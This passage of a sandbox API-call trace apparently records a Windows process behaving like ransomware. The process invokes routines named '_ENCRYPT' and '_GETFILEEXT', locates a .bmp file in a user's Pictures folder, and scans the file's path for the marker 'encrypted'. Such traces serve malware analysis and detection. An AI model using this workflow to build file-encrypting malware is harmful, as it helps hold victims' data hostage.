(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0040.941] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0040.942] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0040.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.943] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0040.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.943] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.943] CloseHandle (hObject=0x140) returned 1 [0040.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0040.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.944] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.944] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.944] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.945] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.945] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0040.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.945] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0040.945] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0040.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0xa7b7e2d0, ftLastWriteTime.dwHighDateTime=0x1d5b90c, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0x7c20c0 [0040.945] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0xa7b7e2d0, ftLastWriteTime.dwHighDateTime=0x1d5b90c, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0x7c20c0 [0040.945] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.946] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.946] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xmQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mQr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qr1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EPn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pn4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n4aYX.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 